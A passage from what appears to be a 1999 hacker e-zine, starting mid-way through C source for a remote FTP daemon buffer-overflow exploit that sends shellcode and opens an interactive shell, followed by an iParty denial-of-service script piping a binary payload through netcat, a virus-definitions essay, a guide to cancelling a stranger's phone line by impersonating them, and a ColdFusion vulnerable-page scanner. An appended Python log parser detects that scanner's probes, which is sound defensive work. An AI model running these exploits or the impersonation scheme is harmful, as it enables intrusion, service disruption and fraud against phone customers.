    strcpy(outbuf+RET_POS,ret_string);
    strcpy(outbuf+RET_POS+strlen(ret_string),ret_string);
    printf("Press any key to send shellcode...\n");
    getchar();
    if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
        fatal("MKD\n");
    if (types[opts.t].overflow_type == 1)
        if (ftp_command(inbuf,250,cin,"DELE %s\n",outbuf)<0)
            fatal("DELE\n");
    /* HEH. For type 1 style we add a dele command. This overflow occurs in
       delete() in ftpd.c. The cause is realpath() in realpath.c not checking
       bounds correctly, overwriting path[] in delete(). */
    RunShell(fd);
    return(1);
}

void RunShell(int thesock)
{
    int n;
    char recvbuf[1024];
    fd_set rset;
    while (1) {
        FD_ZERO(&rset);
        FD_SET(thesock,&rset);
        FD_SET(STDIN_FILENO,&rset);
        select(thesock+1,&rset,NULL,NULL,NULL);
        if (FD_ISSET(thesock,&rset)) {
            n=read(thesock,recvbuf,sizeof(recvbuf)-1); /* leave room for the NUL */
            if (n <= 0) {
                printf("Connection closed\n");
                exit(0);
            }
            recvbuf[n]=0;
            printf("%s",recvbuf);
        }
        if (FD_ISSET(STDIN_FILENO,&rset)) {
            n=read(STDIN_FILENO,recvbuf,sizeof(recvbuf)-1);
            if (n>0) {
                recvbuf[n]=0;
                write(thesock,recvbuf,n);
            }
        }
    }
    return;
}

/* copy the 4 address bytes, doubling any 0xff (the daemon eats single ones) */
int double_up(unsigned long blah, char *doh)
{
    int a;
    unsigned char *ptr,*ptr2;
    bzero(doh,10);
    ptr=(unsigned char *)doh;
    ptr2=(unsigned char *)&blah;
    for (a=0;a<4;a++) {
        *ptr++=*ptr2;
        if (*ptr2==0xff) *ptr++=0xff;
        ptr2++;
    }
    return(1);
}

int parse_pwd(char *in, int *pwdlen)
{
    char *ptr1,*ptr2;
    /* 257 "/" is current directory */
    ptr1 = strchr(in,'\"');
    if (!ptr1) return(-1);
    ptr2 = strchr(ptr1+1,'\"');
    if (!ptr2) return(-1);
    *ptr2 = 0;
    *pwdlen = strlen(ptr1+1);
    /* If its just "/" then it contributes nothing to the RET_POS */
    if (*pwdlen==1) *pwdlen -= 1;
    printf("Home Dir = %s, Len = %d\n",ptr1+1,*pwdlen);
    return(1);
}

int tcp_connect(struct in_addr host,unsigned short port)
{
    struct sockaddr_in serv;
    int fd;
    fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    if (fd < 0) return(-1);
    bzero(&serv,sizeof(serv));
    memcpy(&serv.sin_addr,&host,sizeof(struct in_addr));
    serv.sin_port = htons(port);
    serv.sin_family = AF_INET;
    if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) {
        close(fd);
        return(-1);
    }
    return(fd);
}

/* send one command, read the (possibly multi-line) reply, compare the code */
int ftp_command(char *buf,int success,FILE *out,char *fmt,...)
{
    va_list va;
    char line[1200];
    int val;
    va_start(va,fmt);
    vsnprintf(line,sizeof(line),fmt,va);
    va_end(va);
    if (write(fileno(out),line,strlen(line)) < 0)
        return(-1);
    bzero(buf,200);
    while(1) {
        if (!Fgets(line,sizeof(line),out))   /* disconnected */
            return(-1);
#ifdef DEBUG
        printf("%s",line);
#endif
        if (*(line+3)!='-') break;           /* "nnn-" marks a continuation line */
    }
    strncpy(buf,line,200);
    val = atoi(line);
    if (success != val) return(-1);
    return(1);
}

void fatal(char *string)
{
    printf("%s",string);
    exit(-1);
}

char *Fgets(char *s,int size,FILE *stream)
{
    char *ptr;
    ptr = fgets(s,size,stream);
    //if (!ptr)
    //fatal("Disconnected\n");
    return(ptr);
}

int resolv(char *hostname,struct in_addr *addr)
{
    struct hostent *res;
    if (inet_aton(hostname,addr))
        return(1);
    res = gethostbyname(hostname);
    if (res == NULL)
        return(0);
    memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr));
    return(1);
}

int usage(char *program)
{
    /* the three positional arguments (host, user, password) were dropped from
       the text copy along with their angle brackets; restored from main() */
    fprintf(stderr,"Usage: %s [-c] [-s start_dir]\n",program);
    fprintf(stderr,"\t[-o offset] [-t type] host username password\n");
    fprintf(stderr,"types:\n");
    fprintf(stderr,"0 - %s\n", types[0].name);
    fprintf(stderr,"1 - %s\n", types[1].name);
    fprintf(stderr,"2 - %s\n", types[2].name);
    fprintf(stderr,"3 - %s\n", types[3].name);
    fprintf(stderr,"4 - %s\n", types[4].name);
    fprintf(stderr,"5 - %s\n", types[5].name);
    fprintf(stderr,"\n");
    exit(0);
}
/* -EOF- */
------------------------------
1.06 --=\\ippooper\\=--
#!/bin/sh
# iParty Pooper by Ka-wh00t (wh00t@iname.com) - early May '99 - Created out of pure boredom.
# iParty is a cute little voice conferencing program still widely used (much to my surprise.)
# Unfortunately, the daemon that's included in the iParty download can be shut down remotely.
# And in some circumstances, this can lead to other Windows screw-ups (incidents included internet
# disconnection, ICQ GPFs, Rnaapp crashes, etc.) Sometimes the daemon closes quietly, other times
# a ipartyd.exe GPF. DoSers will hope for the GPF. At time of this script's release, the latest
# (only?) version of iParty/iPartyd was v1.2
# FOR EDUCATIONAL PURPOSES ONLY.
if [ "$1" = "" ]; then
	echo "Simple Script by Ka-wh00t to kill any iParty Server v1.2 and under. (ipartyd.exe)"
	echo "In some circumstances can also crash other Windows progs and maybe even Windows itself."
	echo "Maybe you'll get lucky."
	echo ""
	echo "Usage: $0 "
	echo "Port is probably 6004 (default port)."
	echo ""
	echo "Remember: You need netcat for this program to work."
	echo "If you see something similar to 'nc: command not found', get netcat."
else
	if [ "$2" = "" ]; then
		echo "I said the port is probably 6004, try that."
		exit
	else
		rm -f ipp00p
		cat > ipp00p << _EOF_
$6]}tTյ?"̐ap/HD0iA1/2L%̂EBEԁ'*}yԥ(3znuԏj+(-քd'(tm)ZiXy7 '``3/41/2ϝ Cʹ1/2>ܐE6^^v?^:{n"u'g=o 8Ӂ'L5"鲱ᤁDRGIlqYgii3/4HHw1/23l*o#sC9m,
_EOF_
		echo ""
		echo "Sending kill..."
		cat ipp00p | nc $1 $2
		echo "Done."
		rm -f ipp00p
	fi
fi

------------------------------

--=\\2.00\\=--

2.01

--=\\Understanding a computer virus\\=--

INTRODUCTION

"Information wants to be free!"

In the last few years, much has been said and many text files written about computer viruses. Many rumors, but few straight facts, have led people to be aware of possible problems but have not shown an effective way to deal with them. Today most computer users know of computer viruses, but few know how, or bother, to take even the most basic precautions against them. The majority of all virus infections, and the subsequently destroyed data, could be prevented by a few easy steps. Unfortunately, people with the right kind of insight have long considered it a good policy not to share their knowledge with outsiders. For fear that some people would misuse this information to create more malicious viruses, it has generally been frowned upon to write a text in this area. Obviously this "protection by ignorance" has done no good. Its failure can be seen in the thousands of viruses already in existence, and the new ones constantly appearing.
Virus programmers have had no problem obtaining the information they need to program viruses, but other computer users seeking information on how to protect themselves have been left in the dark. How can anybody protect themselves from what they do not understand? The idea of dangerous, forbidden knowledge has always been particularly distasteful to me. Trying to keep information from people, besides being impossible, has never led to any good. Information needs to be free!

Definition

"Don't buy a computer"

Before going any further in the virus discussion, we need to get a few things clear. What exactly is a computer virus? How does a computer virus differentiate itself from other damaging programs and from other "normal" programs? There has been some confusion on what viruses actually are and what they are not. Often the designation "computer virus" is used simply to denote any destructive program. This, strictly speaking, is not correct. In this text I will try to reach a clear definition of "computer virus" and other computer mischief programs. There are basically three different kinds of these programs: viruses, Trojan horses, and worms. Generally, it can be said that these programs gain access to places and/or perform actions not intended by the user, often damaging data in the process. However, the exact phrases often get misused and mixed. That is not surprising, considering the difficulty even experienced computer users can have in obtaining the "hard" technical information needed to understand the concepts involved. Furthermore, methods that can successfully defend you against one type may have no effect against another. It is important to know what these "rogue" programs do, if you are to defend yourself against them.

Virus

The first computer virus for a personal computer was discovered (and created) around 1980. That means we've had about 15 years to get acquainted with them and used to their presence.
Computer viruses are not a short-lived curiosity; they are here today and will continue to be here for as long as anyone can foresee. They are sufficiently widespread to be a real danger to most computers, requiring people using computers to have at least a basic knowledge of their workings if they want to avoid infections. And even though the term "computer virus" is well known even among people with little computer experience, what a computer virus actually signifies remains a mystery to most people. This is no surprise, since there is disagreement on what a computer virus is, and what it is not, even among people specialized in the computer virus field. There is no general, agreed-upon definition. Still, let's look at some of the basic requirements that must be true before a program can be called a virus.

First, like a biological virus, a computer virus exists to replicate; if it cannot replicate, it's not a virus. A biological virus replicates to spread its DNA. A computer virus replicates to spread its program code. Just as a biological virus changes the cells' own DNA to force them to make new viruses, a computer virus modifies the code in the programs it targets to make new computer viruses.

The term "computer virus" was coined by Fred Cohen in the first paper discussing the theoretical aspects of computer virus programs. His thesis was published as early as 1984, in the days when a virus was still an interesting novelty. However, perhaps because it appeared so early, his definition covers only viruses that propagate by attaching themselves directly to other programs. This is a bit narrow for today's use and does not cover many of the programs that today we call viruses, namely those that propagate by attaching themselves to floppy/hard disks instead of specific programs (partition/boot infectors).
If we just broaden Cohen's definition to include those disk-infecting viruses, we can cover all the different virus types in existence today and still have a small group with common characteristics.

1. A virus is a self-replicating program whose main (only) purpose is to propagate itself to as many different places as possible.

2. A virus propagates itself by modifying another program to include itself.

3. (This is the crux) A virus can only propagate itself by an (unknowing) act of a user of the system in which it exists.

A small note on the plural: "virus" is Latin, meaning poison. In Latin it is a "mass" word, like water and air in English, and as such has no Latin plural. Its correct English plural is viruses, though others are often seen, like viri and virii.

Trojan Horse

Trojan horses are simply programs that feign, by their name or their documentation, to do one thing, when in fact they do something else entirely, something often very destructive. Trojan horses are not very common and (contrary to viruses) are found mostly on "Computer Bulletin Boards". Trojans' spreading potential is not very big, because once they are run they give themselves away (cease to be Trojans), and the only way for a Trojan to propagate itself would be for a user to copy it somewhere else. Besides the author, few people would knowingly spread them (or any other destructive program, for that matter). A typical Trojan horse could simply be a program given the name of another known program, which would be tempting for an unsuspecting user to start. A number of Trojans pretending to be anti-virus or anti-Trojan software have been circulated. The name "Trojan horse" came from the wooden horse the ancient Greek army used to conquer the city of Troy and save the beautiful Helen.
Worm

A worm can be defined as a program propagating itself in a network of computers, using bugs, which are unforeseen (by the designers and users) side effects of the operating system, or breaking (guessing) passwords to gain access to other machines in the network. Contrary to viruses, no user interaction is needed for the worm to spread. Worms need no host program to propagate; viruses are parasitic, worms are not. Periodically, rumors surface of worms existing in a DOS environment, using a modem to propagate themselves. However, that is just a rumor. No worm has ever spread using a modem as a channel. Even though it is possible to make a worm for a DOS system spreading itself in a network of PCs, few have been spotted, mainly because of the limited size of such networks. Today there is only one computer network with sufficient size to enable a worm to be anything but a local menace: the internet. There have been two major outbreaks of worms on the internet, the not-so-famous Christmas Exec mail worm of 1987 and the very famous (infamous) Morris internet worm of 1988.

Written by,
EazyMoney
eazy_money@Cyber-Strike.com

------------------------------

2.02

--=\\Dropping Phonelines\\=--

This is one of the best things I ever figured out and it is easy as 1,2,3. I wrote this for educational use only!! If you fuck up and get busted it is not my ass it is yours. Here we go, you phone addicts:

-Step 1. Go to a COCOT (Customer Owned Coin Operated Telephone). Now dial up a PBX (Private Branch Exchange). All you got to do now is dial up the phone company.

-Step 2. Call the operator and tell him/her you would like to cancel your account with the service. Here is how it will probably go:

--
(operator) (phone company name and his/her name) how may I help you?
(you) I would like to cancel my account with your service.
(operator) What is your name sir/madam and your area code-prefix-number?
(you) Blah blah (the lamer's name that is listed in the phone book)
(operator) Mr. Blah/Ms. Blah, we need your account and access number to go any farther.
(you) What is what?
(operator) It is the digits on top of your last phone bill.
(you) See, that is why I want to cancel my account, reason being I don't ever get the bill or anything of that type, and AT&T/Sprint/MCI has a lot better deal than you guys have.
(operator) Sorry Mr. Blah/Ms. Blah, I can't cancel your phone line without the account and access number.
(you) Well it is not my fault that I don't ever get the bill from your company, it is your fault.
(operator) I am sorry you feel this way. Here is what you can do: come in to our office on (blah).
(you) Look, I am not like other people, I can't get out of the house, I got this disorder and I can't have anyone go there. Just cancel the number please, this will save us both time.
(operator) Please hold Mr. Blah/Ms. Blah.
(you) Ok.
(operator) Your phone number has now been cancelled, thank you for using our service.
(you) Yea ok bye.
--

-Step 3. Hang the phone up and get the fuck out of the area. If on foot and you see the pigs, don't fucking freak out. Same if you are driving. All pigs are gay and dumb so chill.

EazyMoney
eazy_money@Cyber-Strike.com

------------------------------

2.03

--=\\Cold Fusion Scanner\\=--

/*
Usage:
 $ gcc -o cfscan cfscan.c -w (hey i don't want my warnings shown :P)
 $ ./cfscan www.antionline.com > tinylog.txt
 $ echo PBBSER 0wns me

Greets:
 Groups: Phukt Security, The LegionOOT, Team Spl0it, & gH
 Channels (various servers): #hacktech, #hyperlink, #3xposure, #c, #./hack, #ek & #phukt
 People: Cyph3r, n3m0, Adoni, f0bic, d0g, khe0ps, h-S-t, F-o-X, NeonMatrix, Azmodan, v0rt-fu, Tainted Angel, cpu, tw1ster, ultr4k- the intellimouse hax0r, ... the list goes on and on...
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>

/* The three ColdFusion sample pages the scanner looks for. */
static const char *reqs[] = {
	"GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n",
	"GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n",
	"GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n",
};
static const char *names[] = {
	"openfile.cfm", "exprcalc.cfm", "displayopenedfile.cfm",
};

/* Open a fresh connection, send one request and return 1 if the reply
   contains "200" (the only success test the original scanner made). */
static int probe(struct sockaddr_in *host, const char *req)
{
	int sockfd, n;
	char getbuff[1000];

	sockfd = socket(AF_INET, SOCK_STREAM, 0);
	if (connect(sockfd, (struct sockaddr*)host, sizeof(*host)) < 0) {
		perror("connect");
		exit(1);
	}
	send(sockfd, req, strlen(req), 0);
	/* leave room for the NUL: recv() does not terminate the buffer, and
	   strstr() on an unterminated buffer reads past the reply */
	n = recv(sockfd, getbuff, sizeof(getbuff)-1, 0);
	close(sockfd);
	if (n <= 0)
		return 0;
	getbuff[n] = 0;
	return strstr(getbuff, "200") != NULL;
}

int main(int argc, char *argv[])
{
	struct sockaddr_in host;
	struct hostent *he;
	int port = 80, i;

	system("clear");
	printf("\t\tCold Fusion Vulnerability Scanner\n");
	printf("\t\tBy PBBSER -- Phukt Security Coming At You\n");
	if (argc != 2) {
		printf("\nUsage: %s [host]\n", argv[0]);
		exit(0);
	}
	if ((he=gethostbyname(argv[1])) == NULL) {
		perror("getting hostname");
		exit(0);
	}
	memset(&host, 0, sizeof(host));
	bcopy(he->h_addr, (char *)&host.sin_addr, he->h_length);
	host.sin_family=AF_INET;
	host.sin_port=htons(port);

	/* As in the original: if the first page is missing, give up;
	   otherwise report each of the three pages that answers 200. */
	for (i = 0; i < 3; i++) {
		if (probe(&host, reqs[i])) {
			printf("%s found\n", names[i]);
		} else if (i == 0) {
			printf("openfile.cfm wasn't found, so we are gunna exit\n");
			exit(0);
		}
	}
	printf("\nWe're done. Word.\n");
	return 0;
}

PBBSER
pbbser@legionoot.hypermart.net

------------------------------

Please visit: http://www.websponsors.com/cgi-bin/ad_click.cgi?userid=8189&offerid=242 to help us pay the bills. Please take two seconds out of your time and go there.

Antidote is an HNN Affiliate
http://www.hackernews.com

All ASCII art is done by Lord Oak and permission is needed from him before using.
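A defender's counterpart to the Cold Fusion scanner in section 2.03, added here as an example and not part of the zine or of PBBSER's code: it runs over constructed NCSA-style web server log lines (hypothetical addresses) and reports which clients requested the three /cfdocs/expelval/ sample pages the scanner probes, and which of those pages answered 200, meaning the sample application is still installed on the server and should be removed.

```python
import re
from collections import defaultdict

# The three ColdFusion sample pages cfscan requests. A 200 for any of them
# means the /cfdocs sample applications are still installed; remove them.
PROBED_PATHS = {
    "/cfdocs/expelval/openfile.cfm",
    "/cfdocs/expelval/exprcalc.cfm",
    "/cfdocs/expelval/displayopenedfile.cfm",
}

# NCSA common log format: client ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) \S+'
)

def parse_line(line):
    """Parse one log line; return a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Drop the query string and fold case: IIS serves /CFDOCS and /cfdocs alike.
    rec["path"] = rec["path"].split("?", 1)[0].lower()
    return rec

def scan_log(lines):
    """Return (paths probed per client, sample pages that answered 200)."""
    probes = defaultdict(list)
    exposed = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] not in PROBED_PATHS:
            continue
        probes[rec["client"]].append(rec["path"])
        if rec["status"] == 200 and rec["path"] not in exposed:
            exposed.append(rec["path"])
    return dict(probes), exposed

# Constructed log lines for the example (hypothetical addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/May/1999:02:14:01 -0400] "GET /cfdocs/expelval/openfile.cfm HTTP/1.0" 200 1423',
    '203.0.113.7 - - [10/May/1999:02:14:02 -0400] "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0" 404 210',
    '203.0.113.7 - - [10/May/1999:02:14:02 -0400] "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0" 200 980',
    '198.51.100.9 - - [10/May/1999:03:01:40 -0400] "GET /CFDOCS/EXPELVAL/exprcalc.cfm?a=b HTTP/1.0" 403 0',
    '198.51.100.4 - - [10/May/1999:03:20:11 -0400] "GET /index.cfm HTTP/1.0" 200 5120',
]
```

Running scan_log(SAMPLE_LOG) shows the first client walking all three pages in the scanner's order within a second, which is the signature to alert on even when every reply is a 404.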